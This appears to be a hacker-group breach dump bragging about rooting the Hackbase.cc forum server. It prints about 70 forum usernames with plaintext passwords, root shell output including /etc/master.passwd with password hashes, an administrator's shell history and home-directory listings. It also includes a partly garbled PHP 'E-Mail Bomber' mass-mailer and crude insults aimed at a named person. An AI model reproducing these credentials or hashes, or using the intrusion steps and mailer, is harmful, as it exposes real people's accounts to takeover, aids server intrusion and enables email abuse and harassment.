1 root root 19541 Sep 24 11:16 LICENSE +-rw-r--r-- 1 root root 44905 Sep 24 11:16 ajax.php +-rw-r--r-- 1 root root 75977 Sep 24 11:16 album.php +-rw-r--r-- 1 root root 19375 Sep 24 11:16 announcement.php +-rw-r--r-- 1 root root 4269 Sep 24 11:16 api.php +-rw-r--r-- 1 root root 3862 Sep 24 11:16 apichain.php +drwxr-xr-x 2 root root 4096 Oct 1 15:06 archive +-rw-r--r-- 1 root root 8745 Sep 24 11:16 asset.php +-rw-r--r-- 1 root root 20438 Sep 24 11:16 assetmanage.php +-rw-r--r-- 1 root root 15831 Sep 24 11:16 attachment.php +-rw-r--r-- 1 root root 6690 Sep 24 11:16 attachment_inlinemod.php +-rw-r--r-- 1 root root 1960 Sep 25 10:03 banlist.php +-rw-r--r-- 1 root root 3657 Sep 24 11:16 blog_attachment.php +-rw-r--r-- 1 root root 96572 Sep 24 11:16 calendar.php +-rw-r--r-- 1 root root 3336 Sep 24 11:16 ckeditor.php +-rw-r--r-- 1 root root 43 Sep 24 11:16 clear.gif +drwxr-xr-x 11 root root 4096 Oct 1 15:09 clientscript +-rw-r--r-- 1 root root 15382 Sep 24 11:16 converse.php +drwxr-xr-x 7 root root 4096 Oct 1 15:09 cpstyles +-rw-r--r-- 1 root root 3263 Sep 24 11:16 cron.php +-rw-r--r-- 1 root root 6206 Sep 24 11:16 css.php +drwxrwxrwx 3 root root 36864 Oct 2 10:09 customavatars +drwxr-xr-x 3 root root 4096 Oct 1 15:09 customgroupicons +drwxrwxrwx 2 root root 20480 Oct 2 07:58 customprofilepics +-rw-r--r-- 1 root root 1739 Sep 24 11:16 editor.php +-rw-r--r-- 1 root root 47262 Sep 24 11:16 editpost.php +-rw-r--r-- 1 root root 1355 Sep 24 11:16 entry.php +-rw-r--r-- 1 root root 30313 Sep 24 11:16 external.php +-rw-r--r-- 1 root root 9920 Sep 24 11:16 faq.php +-rw-r--r-- 1 root root 10134 Sep 24 11:16 favicon.ico +-rw-r--r-- 1 root root 22480 Sep 24 11:16 forum.php +-rw-r--r-- 1 root root 43139 Sep 24 11:16 forumdisplay.php +-rw-r--r-- 1 root root 2025 Sep 24 11:16 global.php +-rw-r--r-- 1 root root 152626 Sep 24 11:16 group.php +-rw-r--r-- 1 root root 26181 Sep 24 11:16 group_inlinemod.php +-rw-r--r-- 1 root root 11362 Sep 24 11:16 groupsubscription.php +-rw-r--r-- 1 root root 9016 Sep 24 11:16 image.php +drwxr-xr-x 26 root root 4096 Oct 1 15:10 images +drwxr-xr-x 9 root root 12288 Oct 1 19:34 includes +-rw-r--r-- 1 root root 114 Oct 2 05:57 index.php +-rw-r--r-- 1 root root 47257 Sep 24 11:16 infraction.php +-rw-r--r-- 1 root root 187319 Sep 24 11:17 inlinemod.php +-rw-r--r-- 1 root root 6831 May 14 02:43 itrader.php +-rw-r--r-- 1 root root 15395 Aug 25 15:30 itrader_detail.php +-rw-r--r-- 1 root root 12933 Aug 25 14:14 itrader_feedback.php +-rw-r--r-- 1 root root 1405 Apr 21 03:45 itrader_global.php +-rw-r--r-- 1 root root 23116 Aug 25 17:15 itrader_main.php +-rw-r--r-- 1 root root 3970 Apr 21 03:45 itrader_report.php +-rw-r--r-- 1 root root 1779 Aug 6 06:47 jabber.php +-rw-r--r-- 1 root root 11697 Sep 24 11:16 joinrequests.php +-rw-r--r-- 1 root root 1675 Sep 24 11:17 list.php +-rw-r--r-- 1 root root 11055 Sep 24 11:17 login.php +-rw-r--r-- 1 root root 30872 Sep 24 11:17 member.php +-rw-r--r-- 1 root root 16346 Sep 24 11:17 member_inlinemod.php +-rw-r--r-- 1 root root 40089 Sep 24 11:17 memberlist.php +drwxr-xr-x 6 root root 4096 Oct 1 15:10 mgc_cb_evo +-rw-r--r-- 1 root root 60012 May 17 2010 mgc_cb_evo.php +-rw-r--r-- 1 root root 49969 Sep 25 13:43 mgc_cb_evo_ajax.php +-rw-r--r-- 1 root root 22218 Sep 24 11:17 misc.php +-rw-r--r-- 1 root root 5866 Sep 24 11:17 mobile.php +-rw-r--r-- 1 root root 76344 Sep 24 11:17 moderation.php +-rw-r--r-- 1 root root 6733 Sep 24 11:17 moderator.php +-rw-r--r-- 1 root root 17516 Sep 24 11:17 newattachment.php +-rw-r--r-- 1 root root 41424 Sep 24 11:17 newreply.php +-rw-r--r-- 1 root root 20622 Sep 24 11:17 newthread.php +-rw-r--r-- 1 root root 21562 Sep 24 11:17 online.php +drwxr-xr-x 7 root root 4096 Oct 1 15:10 packages +-rw-r--r-- 1 root root 8526 Sep 24 11:17 payment_gateway.php +-rw-r--r-- 1 root root 13314 Sep 24 11:17 payments.php +-rw-r--r-- 1 root root 4016 Sep 24 11:17 picture.php +-rw-r--r-- 1 root root 16619 Sep 24 11:17 picture_inlinemod.php +-rw-r--r-- 1 root root 26550 Sep 24 11:17 picturecomment.php +-rw-r--r-- 1 root root 29311 Sep 24 11:17 poll.php +-rw-r--r-- 1 root root 10318 Sep 24 11:17 posthistory.php +-rw-r--r-- 1 root root 76497 Sep 24 11:17 postings.php +-rw-r--r-- 1 root root 7037 Sep 24 11:17 printthread.php +-rw-r--r-- 1 root root 81357 Sep 24 11:17 private.php +-rw-r--r-- 1 root root 163788 Sep 24 11:17 profile.php +-rw-r--r-- 1 root root 56552 Sep 24 11:17 register.php +-rw-r--r-- 1 root root 7248 Sep 24 11:17 report.php +-rw-r--r-- 1 root root 14719 Sep 24 11:17 reputation.php +-rw-r--r-- 1 root root 127 Sep 26 02:58 rules.php +-rw-r--r-- 1 root root 35091 Sep 24 11:17 search.php +-rw-r--r-- 1 root root 22872 Sep 24 11:17 sendmessage.php +-rw-r--r-- 1 root root 12879 Sep 24 11:17 showgroups.php +-rw-r--r-- 1 root root 12806 Sep 24 11:17 showpost.php +-rw-r--r-- 1 root root 82207 Sep 24 11:17 showthread.php +drwxrwxrwx 2 root root 4096 Oct 1 17:57 signaturepics +drwxr-xr-x 2 root root 4096 Oct 1 15:10 store_sitemap +-rw-r--r-- 1 root root 39241 Sep 24 11:17 subscription.php +-rw-r--r-- 1 root root 5353 Sep 24 11:17 tags.php +-rw-r--r-- 1 root root 8754 Sep 24 11:17 threadrate.php +-rw-r--r-- 1 root root 11104 Sep 24 11:17 threadtag.php +-rw-r--r-- 1 root root 61 Sep 24 11:17 uploadprogress.gif +-rw-r--r-- 1 root root 39671 Sep 24 11:17 usercp.php +-rw-r--r-- 1 root root 21703 Sep 24 11:17 usernote.php +drwxr-xr-x 13 root root 4096 Oct 1 15:10 vb +-rw-r--r-- 1 root root 28505 Sep 24 11:17 visitormessage.php +-rw-r--r-- 1 root root 126 Jul 10 18:23 vv.php +-rw-r--r-- 1 root root 1679 Sep 24 11:17 widget.php +-rw-r--r-- 1 root root 3801 Sep 24 11:17 xmlsitemap.php +drwxr-xr-x 3 root root 4096 Oct 1 15:06 xxxoinbe843bSIUf4igfn49ugnsdkmngwei9fu +drwxr-xr-x 2 root root 4096 Oct 1 15:10 zzzsf84bfsadifubSIDFUB48bf + +# head -n75 includes/config.php + +elax:jessica +emdre:lunartec1 +fair_playa77:J6Dm8hFhJ6Dm8hFh +fakedMe:eileen13 +fakerboy:frankycrew12345 +fallout:wazzzappsp3 +flon203:flon@Nex +glow:amolacar1994+#!Asdf +hades:hi1337 +hakan123:hakan +heisenb6rg:3e2w1q +homouus:lolfisch +homouus:lolfische +iks:noji987 +jannizzz:lol123 +johnlopez:948nF)§(J03kd09j3 +kaye:kaye1234 +knell:novn7L8n +krillewurm:manfred2711 +krono§:1337return1337 +kryptôn:123456789ss +lasdas:123456 +leonard:wj0oU3QJr7pgZ +lolboter:lila123 +lowbird:3mksu92k=DAK"=)213s +lucifer:3.fv!G,$7Ft/;zx,5§Y$Gh"f4tv!D§$3a%0Gy(hXH +misanthrop:vju4S4KSthdUD +miss.marpel:m4NnrxfZ6QbbyhZc +mividaloca:jmZ5rjSkjl#7Qm23+::SmqW.cY}U8c +mr. CC:Ficken1337 +mr.montana:46samira46 +muti:fuckthatshitinass22 +n1312:JKjd(()&%hf%&g837gdf +neocrow:6/4=)6$§61%)6/=1/ +nighter:Six6Pack +ooops:ichkommauskielderstadtammeer241985 +paco:13xqextraordinary37 +paulpanzer:159159159 +pelikan:B3v8aZPS +phen:utecpnkq6512429myaccount! +prosto:16471647 +ps24h:Q!ä?-sK2%8AcfÜ2.=% +purplera1n:rg5hg54gh45hg +r4nd0m:fuckyou1 +rabbit:nSRXQm3G +rad0n:12345 +reQ:Mesum3565me35650108e711lol +romulus:v678rheberhbeg +sani:19n4schk4tz385 +sips:5hgedhtbdh +slic3menic3:DkWLjh8G +snoppy0066:pueppyi1AA +sqli~hoe:ArZt1994 +st3aLth:1337!Aa +td4s:1qaz2wsx +th3p0is0n:th3p0is0nrules1337 +till7:peter123 +tivja:fabuge28 +trixx:makemoney! +unnex:selfmode3 +vendor84453:15zocker15 +veryanonym:wasnhierlosman1991 +vittula:oddset06 +wacked2:klfGKDfksdmfoc5§io +wastl:wastl24 +xK1NG:xhu12101995xier +xTonyStylesx:pol1pol2 +z4pz4r4p:AzzarackAttack +zionnoob:123456 + + ,;~;, + _/\ + \ ) + (\\ ()) + /';;,, // | +-------========{ Hackbase.cc }========))))))))))))))=m( )_ __ + | ,(.' '~/()' ' '\ +We can't say much here because we would start ~ | ||( );, +repeating ourselves. But anyway, on Hackbase.cc ( ,;.)-\ / ';, +the banner says "Hacking, Carding & more". Don't \ ( \ ( +ask why we owned them; the community and that || \\ +banner begged for it. By now you know our moti- /_( /_( +vation, you know our goals, deal with it. +But there is something else which was a thorn in our side. It seems +that Easy Laster aka ea former admin of Free-Hack (after we owned +them), hosts his 4004-Security-Project on Hackbase's server. +4004-security-project.com was a blog on that Easy constantly posts +horribly lame exploits for all kind of webapps that nobody uses while +thinking that by publishing all this bullshit he'd actually help +people. Actually it's a known fact that he sucks all kinds of cock for +vulnerabilities to put on exploit-db, just check it out: +exploit-db.com/author/?a=2201. It's hilarious and more than obvious +that he is one of those kids that try to inject a ' into every +parameter on a website. Here is what you get. + + +# uname -a +FreeBSD FreeBSD 8.2-RELEASE-p3 #0: Fri Sep 30 16:23:24 MSD 2011 amd64 + +# id +uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) + +# cat /etc/passwd +# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $ +# +root:*:0:0:Charlie &:/root:/bin/csh +toor:*:0:0:Bourne-again Superuser:/root: +daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin +operator:*:2:5:System &:/:/usr/sbin/nologin +bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin +tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin +kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin +games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin +news:*:8:8:News Subsystem:/:/usr/sbin/nologin +man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin +sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin +smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin +mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin +bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin +proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin +_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin +_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin +uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico +pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin +www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin +nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin +mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin +postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin +webserver:*:1000:1000:User &:/home/webserver:/sbin/nologin +secunet:*:1002:1002:User &:/home/secunet:/sbin/nologin +testsite:*:1003:1003:User &:/home/testsite:/sbin/nologin +224422:*:1004:1004:User &:/home/224422:/sbin/nologin +testserver:*:1005:1005:User &:/home/testserver:/sbin/nologin +union:*:1006:1006:User &:/home/union:/sbin/nologin +hbstream:*:1001:1001:User &:/home/hbstream:/sbin/nologin + +# cat /etc/master.passwd +# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $ +# +root:$1$cyeIuWcS$dKdflWuxgGARl2fSKU8gt1:0:0::0:0:Charlie &:/root:/bin/csh +toor:*:0:0::0:0:Bourne-again Superuser:/root: +daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin +operator:*:2:5::0:0:System &:/:/usr/sbin/nologin +bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin +tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin +kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin +games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin +news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin +man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin +sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin +smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin +mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin +bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin +proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin +_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin +_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin +uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico +pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin +www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin +nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin +mysql:*:88:88::0:0:MySQL Daemon:/nonexistent:/sbin/nologin +postfix:*:125:125::0:0:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin +webserver:$1$aJvdDZwW$s0ArlD0j8Mp7.TNNWHfb61:1000:1000::0:0:User &:/home/webserver:/sbin/nologin +secunet:$1$1rSKOEED$t2rUxxCrpjM2dEOLj60hn1:1002:1002::0:0:User &:/home/secunet:/sbin/nologin +testsite:$1$UbUABgoI$YtxsunrUQShX8SvMzc9Q61:1003:1003::0:0:User &:/home/testsite:/sbin/nologin +224422:$1$wnqKSLwS$6oJKVhnALXFO40nUQerrd0:1004:1004::0:0:User &:/home/224422:/sbin/nologin +testserver:$1$a8H.A2qA$XmH5GlVXWwXDbZOsdexeU.:1005:1005::0:0:User &:/home/testserver:/sbin/nologin +union:$1$UwJ9q.lU$kMqN2S5JqT/fLPgzlIAGO/:1006:1006::0:0:User &:/home/union:/sbin/nologin +hbstream:$1$MVeAfs8T$Fp2/xBRF0jIyT4DZIvqIf.:1001:1001::0:0:User &:/home/hbstream:/sbin/nologin + +# pwd +/root + +# ls -la +total 6292 +drwxr-xr-x 4 root wheel 512 Sep 29 09:07 . +drwxr-xr-x 18 root wheel 512 Jul 1 01:53 .. +-rw------- 1 root wheel 10971 Oct 4 14:44 .bash_history +-rw-r--r-- 1 root wheel 798 Jan 18 2010 .cshrc +-rw------- 1 root wheel 5249 Sep 30 21:55 .history +-rw-r--r-- 1 root wheel 155 Jan 18 2010 .k5login +-rw------- 1 root wheel 71 Jul 5 15:47 .lesshst +-rw-r--r-- 1 root wheel 303 Jan 18 2010 .login +drwx------ 3 root wheel 512 Sep 29 09:07 .mc +-rw------- 1 root wheel 18 Jul 21 17:26 .mysql_history +-rw-r--r-- 1 root wheel 265 Jan 18 2010 .profile +drwx------ 2 root wheel 512 Mar 10 2010 .ssh +-rw-r--r-- 1 root wheel 0 Jul 5 15:46 ec1902 +-rw-r--r-- 1 root wheel 168 Feb 1 2010 example.php +-rw-r--r-- 1 root wheel 476 Sep 2 06:37 forsirius.conf +-rw-r--r-- 1 root wheel 3150763 Feb 21 2011 ioncube_loaders_fre_8_x86-64.tar.gz + +# cat .bash_history +make install clean +cd /usr/ports/devel/ZendOptimizer/ +make install clean +mc -d +cd /usr/ports/ +search name=eaccelerator +make search name=eaccelerator +cd /usr/ports/www/eaccelerator +make install clean +mkdir /tmp/eaccelerator +chown www /tmp/eaccelerator +chmod 0700 /tmp/eaccelerator +mc -d +cd /usr/ports/ +make search name=ioncube +cd /usr/ports/devel/ioncube +make install clean +mc -d +cd /usr/ports/lang/php52-extensions/ +make install clean +pkg_version -vIL= +php -v +php -m +php -v +php -m +history +php -v +mc +php -v +php -v +mc +php -m +mc +mc +pkg_info|grep ioncube +pkg_info|grep php +mc -d +ifconfig +apachectl start +mc -d +fetch http://downloads2.ioncube.com/loader_downloads/ioncube_loaders_fre_8_x86-64.tar.gz +php loader-wizard.php +rm loader-wizard.php +cd /usr/ports/devel/ioncube/ +make clean +make +/usr/local/etc/rc.d/nginx start +mcedit -d /etc/rc.conf +/usr/local/etc/rc.d/nginx start +ifconfig +apachectl restart +ps ax|grep apache +ps ax|grep http +apachectl start +ps ax|grep http +cat /var/log/httpd/httpd_error.log +cat /var/log/httpd/httpd_error.log +apachectl start +ps ax|grep http +apachectl stop +apachectl start +php -v +cd / +php -v +php -v +/usr/local/etc/rc.d/nginx stop +/usr/local/etc/rc.d/apache22 restart +exit +edit /etc/rc.conf +exit +ps ax +cd /home/ +ls -l +cd webserver/ +ls -l +ls -l +mc +sockstat -l4 +vi /etc/rc.conf +jls +mc +apachectl restart +tail -n 100 /var/log/httpd/httpd_access.log +tail -n 100 /var/log/httpd/httpd_error.log +mc +tail -n 100 /var/log/httpd/httpd_error.log +mc +tail -n 100 /var/log/httpd/httpd_error.log +ls -la /home +ls -la /home/webserver/ +ls -la /home/webserver/free-hack.in/ +ls -la /home/webserver/free-hack.in/msd1/ +chmod -R 755 /home/webserver/ +exit +mcedit /etc/my.cnf +/usr/local/etc/rc.d/mysql-server restart +exit +mc +/usr/local/etc/rc.d/mysql-server restart +mcedit /usr/local/etc/php.ini +apachectl restart +php -m +php -v +exit +passwd +exit +passwd +tail -f /var/log/httpd/httpd_access.log +top +ps ax | grpe http | wc -l +ps ax | grep http | wc -l +tail -f /var/log/httpd/httpd_access.log +top +mysql -uroot -p`cat /etc/my.passwd ` +uname -a +mailq +postsuper -D ALL +postsuper -d ALL +mailq +/usr/local/etc/rc.d/mysql-server restart +mysql -uroot -p`cat /etc/my.passwd ` +mc +gstat +ps auxf +ifconfig +ee /usr/local/etc/apache22/httpd.conf +ee /usr/local/etc/nginx/nginx.conf +/usr/local/etc/rc.d/apache22 restart +/usr/local/etc/rc.d/nginx restart +/usr/local/etc/rc.d/nginx stop +ifconfig +ifconfig +head /usr/local/etc/apache22/httpd.conf +ps auxf +ee /usr/local/etc/apache22/httpd.conf +/usr/local/etc/rc.d/apache22 restart +ls -la /home/freakyfreehack/ +ee /usr/local/etc/apache22/httpd.conf +/usr/local/etc/rc.d/apache22 restart +ls -la /home/secunet/ +tail -f /var/log/httpd/httpd_access.log +/usr/local/etc/rc.d/apache22 restart +mc +/usr/local/etc/rc.d/apache22 restart +ifconfig +mc +ps wauxf +ifconfig +tail -f /var/log/httpd/httpd_access.log | grep server +killall -9 tail +tail -100 /var/log/httpd/httpd_access.log | grep server +ps wauxf +tail -1-00 /var/log/httpd/httpd_access.log | grep server +tail -1000 /var/log/httpd/httpd_access.log | grep server +ps wauxf +history +ps ax | grep http | wc -l +ps ax | grep http | wc -l +ps ax | grep http | wc -l +ps ax | grep http | wc -l +/usr/local/etc/rc.d/apache22 restart +ps ax | grep http | wc -l +ps ax | grep http | wc -l +ps ax | grep http | wc -l +ps ax | grep http | wc -l +ps ax | grep http | wc -l +ps ax | grep http | wc -l +ps ax | grep http | wc -l +mc +apachectl restart +apachectl stop +apachectl start +top +/usr/local/etc/rc.d/apache22 restart +top +head /usr/local/etc/apache22/httpd.conf +ps wauxf +ps wauxf | gre nginx +ps wauxf | grep nginx +cd /home/ +grep testsite15.w2c.ru /usr/local/etc/apache22/vhosts/* +cd /home/forsirius/testsite15.w2c.ru +ls -la +grep testsite.w2c.ru /usr/local/etc/apache22/vhosts/* +grep w2c.ru /usr/local/etc/apache22/vhosts/* +cd /home/forsirius/testsite15.w2c.ru +ls -la +ifconfig +cd .. +ls -la +cd .. +ls -la +mc +cd /home/forsirius/testsite.w2c.ru +grep w2c.ru /usr/local/etc/apache22/vhosts/* +ifconfig +cat /etc/rc.conf +cat /etc/rc.conf +ifconfig +cat /etc/rc.conf +cat /etc/rc.local +cat /etc/rc.local +cat /etc/rc.conf +cd /home/224422/ +ls -[la +ls -la +cd 224422.w2c.ru/ +ls -la +ls -la +cat index.php +cd inn +cd inc +ls -la +cd .. +ls -la +ls -la pwd +ls -la adm +date +ntpdate -v -b in.pool.ntp.org +ntpdate -v -b pool.ntp.org +date 0037 +date +date --help +date +mc +ps ax +/usr/local/etc/rc.d/apache22 start +ps ax +ps ax +ps ax +/usr/local/etc/rc.d/apache22 restart +mc +/usr/local/etc/rc.d/apache22 restart +top +/usr/local/etc/rc.d/apache22 restart +top -S +netstat +top -S +tcpdump +exit +/usr/local/etc/rc.d/apache22 restart +exit +ps ax +exit +cat /usr/local/etc/apache22/vhosts/hackerzhub.conf +cat /usr/local/etc/apache22/vhosts/secunet.conf +history | grep php +ee /usr/local/etc/php.ini +tail -100 /var/log/httpd/httpd_access.log +grep hackbase.cc /usr/local/etc/apache22/vhosts/* +cd /home/webserver/hackbase.cc +ls -la +ee info.php +ee /usr/local/etc/php-apache.ini +/usr/local/etc/rc.d/apache22 reload +/usr/local/etc/rc.d/apache22 reload +/usr/local/etc/rc.d/apache22 restart +nslookup +nslookup +exit + +# cd /home + +# ls -la +total 36 +drwxr-x--x 9 root wheel 512 Oct 14 00:41 . +drwxr-xr-x 18 root wheel 512 Jul 1 01:53 .. +drwxrwxr-x 4 224422 www 512 Oct 9 20:19 224422 +drwxr-x--- 5 4004 www 512 Oct 8 18:55 4004 +drwxr-x--- 10 hbstream www 512 Oct 9 19:37 hbstream +drwxr-x--- 5 secunet www 512 Jul 6 21:14 secunet +drwxr-x--- 3 testserver www 512 Sep 21 18:11 testserver +drwxr-x--- 3 testsite www 512 Sep 2 06:55 testsite +drwxr-xr-x 6 webserver www 512 Oct 14 00:37 webserver + +# cd 224422 + +# ls +224422.w2c.ru temp + +# ls -la +total 16 +drwxrwxr-x 4 224422 www 512 Sep 18 18:05 . +drwxr-x--x 9 root wheel 512 Sep 30 10:52 .. +drwxrwx--- 4 224422 www 512 Sep 20 18:24 224422.w2c.ru +drwxrwx--- 2 224422 www 2048 Sep 20 15:04 temp + +# cd 224422.w2c.ru + +# ls -la +total 36 +drwxrwx--- 6 224422 www 512 Oct 18 17:58 . +drwxrwxr-x 4 224422 www 512 Oct 9 20:19 .. +drwxrwxrwx 3 224422 www 1024 Sep 18 17:26 Checker +-rw-r--r-- 1 224422 www 1034 Sep 20 18:24 index.html +drwxr-xr-x 11 224422 www 512 Sep 19 17:36 istealer +-rw-r--r-- 1 224422 www 2704 Oct 18 17:58 mail.php +drwxrwxrwx 2 224422 www 512 Oct 13 21:46 test +drwxrwxrwx 3 224422 www 512 Oct 13 21:41 test2 + +# cat mail.php + + + + + + + + + + +E-Mail Bomber + + +email, $bom, $anon, $von); + if($mail == TRUE){ + echo $row->email . " hat EMail erhalten."."
";} + else{ + echo $row->email . " hat keine Email erhalten."."
";} + } +} +?> +
######################################
+##########-DB-Mass-Mailer--###########
+#################-by-#################
+##############--bebop--###############
+######################################

+
+ + + + + + + +
Email-Liste:
Betreff:
+ +
von:
+ +